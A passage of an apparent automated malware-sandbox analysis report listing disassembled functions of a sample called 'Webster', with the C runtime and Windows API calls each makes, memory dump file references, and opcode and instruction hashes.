                                                                                  • Instruction Fuzzy Hash: 02F0A47650421DB6CB21ABA8ED159DE7BFC9F02760F50446AF814A72D1EFB18BC0C2A4
                                                                                  Function 00AA581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock_file_memset
                                                                                  • String ID:
                                                                                  • API String ID: 26237723-0
                                                                                  • Opcode ID: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
                                                                                  • Instruction ID: bc1658cc3be21eae7208c755f9325cfd17512aa16dbe5b73a5d040d64805d1c8
                                                                                  • Opcode Fuzzy Hash: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
                                                                                  • Instruction Fuzzy Hash: 52018471C00649EBCF11AF79CD0189EBB61AF86760F184115F8242B1E1DB398A21EF91
                                                                                  Function 00AA55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  • __lock_file.LIBCMT ref: 00AA560B
                                                                                    • Part of subcall function 00AA6E3E: __lock.LIBCMT ref: 00AA6E61
                                                                                  • __fclose_nolock.LIBCMT ref: 00AA5616
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
                                                                                  • Instruction ID: c9fc389840311a78ed505a40683ff5d8f5689c9438f09ff3bfa0b0871f83fa58
                                                                                  • Opcode Fuzzy Hash: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
                                                                                  • Instruction Fuzzy Hash: 3EF0B471C02B069BD720ABB9890276E77E16F43330F258209E424AB1C1CB7C89019F59
                                                                                  Function 00AA5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 00AA5EB4
                                                                                  • __ftell_nolock.LIBCMT ref: 00AA5EBF
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2999321469-0
                                                                                  • Opcode ID: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
                                                                                  • Instruction ID: 9aecf0b1ad49fe513e9f7a41f1c062a920d3d06c832813661a3ebde34dad5cc0
                                                                                  • Opcode Fuzzy Hash: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
                                                                                  • Instruction Fuzzy Hash: 58F0EC32D11615AAD710BB748A0375E76A0AF03331F254206F420BB1D1CF7C4E019B55
                                                                                  Function 00A95AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A95AEF
                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A95B1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell__memset
                                                                                  • String ID:
                                                                                  • API String ID: 928536360-0
                                                                                  • Opcode ID: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
                                                                                  • Instruction ID: ed71b5cb0920d247f3d03c68132a106e2b62406637a71e046cdeb89200d2d2c4
                                                                                  • Opcode Fuzzy Hash: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
                                                                                  • Instruction Fuzzy Hash: 41F0A7719583089FDB929B24DC467D577BCA702308F0002E9FA4897292DFB14B88CF55
                                                                                  Function 00AFC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString$__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 207118244-0
                                                                                  • Opcode ID: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
                                                                                  • Instruction ID: 3b9ba3c465c9c05c0118d15915e4c254869507d370f5465be5e3cdd39b967efd
                                                                                  • Opcode Fuzzy Hash: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
                                                                                  • Instruction Fuzzy Hash: 98B13C35A0010E9FCF14EF95C9919FEB7B5FF58760F10811AFA15AB291EB70A941CB50
                                                                                  Function 00A8A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                  • Instruction ID: 117f5b2822fdb5acf41958aa9a69d4b4470de0e3b310a77d8d7cc56a50924cdf
                                                                                  • Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                  • Instruction Fuzzy Hash: A361B9706046069FEB10EF54C981F7AB7F5EF24300F11806EE91A9B291E774ED81CB62
                                                                                  Function 00A9343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                  • Instruction ID: 6ca112584d007b714f0a43eb56c3070cc0cc7a7a44cfb937b8873494a96869b6
                                                                                  • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                  • Instruction Fuzzy Hash: F5319C7A204A02DFCF249F18D480A25F7F0FF49310B15C569E88A8B791DB30E881CB90
                                                                                  Function 00ABE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 78b2fcc59f4b62658bb593e8a523a5b284410818860dd5f299c682bc64781b0d
                                                                                  • Instruction ID: 3d4b4b5b17d35f51a9152329736c03bdc8b2c614dd2fd2711f1531c86fbf5eda
                                                                                  • Opcode Fuzzy Hash: 78b2fcc59f4b62658bb593e8a523a5b284410818860dd5f299c682bc64781b0d
                                                                                  • Instruction Fuzzy Hash: AB411874908341DFEB14EF14C588B5ABBE1BF45358F0989ACE8898B362C371EC85CB52
                                                                                  Function 00A949C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A94B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A94B63
                                                                                    • Part of subcall function 00AA547B: __wfsopen.LIBCMT ref: 00AA5486
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4
                                                                                    • Part of subcall function 00A94ADE: FreeLibrary.KERNEL32(00000000), ref: 00A94B18
                                                                                    • Part of subcall function 00A948B0: _memmove.LIBCMT ref: 00A948FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1396898556-0
                                                                                  • Opcode ID: 333ac3d7428ddd6b8973de9ade03dbee7942c2beba086517e31ec518f3b007df
                                                                                  • Instruction ID: e1032ed36b5167377229dd9041cb01c573103245c4af7c6dba5606da54b6b442
                                                                                  • Opcode Fuzzy Hash: 333ac3d7428ddd6b8973de9ade03dbee7942c2beba086517e31ec518f3b007df
                                                                                  • Instruction Fuzzy Hash: AE11E332750205ABDF10FB70CE06FAE77E99F48741F10842AF542A7591EF709E12ABA4
                                                                                  Function 00A91BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                  • Instruction ID: 0a5ff80a95408a776bf0fbaba0be8d0251e0f75baed8c9394e41f3737e6d1c6e
                                                                                  • Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                  • Instruction Fuzzy Hash: B2112E76604606DFDB24DF28D581916F7F9FF49354B20C82EE49ACB661E732E841CB50
                                                                                  Function 00ABE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 8136bc12821d1dfee06d8c4e6644684748be9d97aaff9332d2ee144015176a43
                                                                                  • Instruction ID: c3c89377b96d9e38c2320e137df147b9536b9bf1cc75378619b1a56c96a2222b
                                                                                  • Opcode Fuzzy Hash: 8136bc12821d1dfee06d8c4e6644684748be9d97aaff9332d2ee144015176a43
                                                                                  • Instruction Fuzzy Hash: EE212EB4908341DFDB14EF14C548A5ABBE4BF84304F0589ACE88A57362D331E849CB92
                                                                                  Function 00A91A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                  • Instruction ID: 2604d5948a8719738e1fc4ed943517223487456092b3e4c1a08f14ec968b0ae4
                                                                                  • Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                  • Instruction Fuzzy Hash: 4D01D6722017026ED7245B38DD02F67BBE8DB457E0F10852AF51ACB5D1EB31E8408794
                                                                                  Function 00AF495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00AF4998
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable
                                                                                  • String ID:
                                                                                  • API String ID: 1431749950-0
                                                                                  • Opcode ID: 4ecc8b64234ea5333805a835172821375946c53026403dd774a1541905b6a570
                                                                                  • Instruction ID: ca8ccb3b4938b18c79e91df6006d2d3a072c22c56c70dbe355ba472886a98861
                                                                                  • Opcode Fuzzy Hash: 4ecc8b64234ea5333805a835172821375946c53026403dd774a1541905b6a570
                                                                                  • Instruction Fuzzy Hash: ADF03135608109BFCB14FB65D946CAF77BCEF49360B004059F9089B291EF70AD41C750
                                                                                  Function 00AE7C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • _memset.LIBCMT ref: 00AE7CB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 525207782-0
                                                                                  • Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                  • Instruction ID: 378b7aae551a4ce7a63242cd33da9c6cfa05379343598904b9379ae5524e5a37
                                                                                  • Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                  • Instruction Fuzzy Hash: 380119752082019FD321EF5CDA41F09BBE5AF5A310F24C45AF5888B392DB72E800CF90
                                                                                  Function 00ABDC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • _memmove.LIBCMT ref: 00ABDC8B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1602317333-0
                                                                                  • Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                  • Instruction ID: 1a3e89a6739180956f2cae08b4cc226e73b81655e6392f95a7320c629669ccdd
                                                                                  • Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                  • Instruction Fuzzy Hash: F8F0A974604101DFD715DF68CA81E19BBE1BF5A344B24849CE5898B3A2E772E851CB91
                                                                                  Function 00A94A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _fseek
                                                                                  • String ID:
                                                                                  • API String ID: 2937370855-0
                                                                                  • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                  • Instruction ID: 111d26a99ba254541999d008f2d7b63d59a38e2d833a3e5e3b333ec85e0f3e30
                                                                                  • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                  • Instruction Fuzzy Hash: 7EF085B6900208BFDF108F94DC04DEBBBBEEF89320F004198F9045B210D232EA218BA0
                                                                                  Function 00A94A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,?,00A927AF,?,00000001), ref: 00A94A63
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 9ae7015910e87c04e8215fb8ea3407147ed44a56fc48eba4ca61acb12c051203
                                                                                  • Instruction ID: 80acbb29bde2e724c9fd8af4ddfe815b69784feff800fdf2239a0ef0bb85510f
                                                                                  • Opcode Fuzzy Hash: 9ae7015910e87c04e8215fb8ea3407147ed44a56fc48eba4ca61acb12c051203
                                                                                  • Instruction Fuzzy Hash: EEF01571645702CFCF349F68E890C1ABBF0AF183693208A2EE1D683A10C7319984DB48
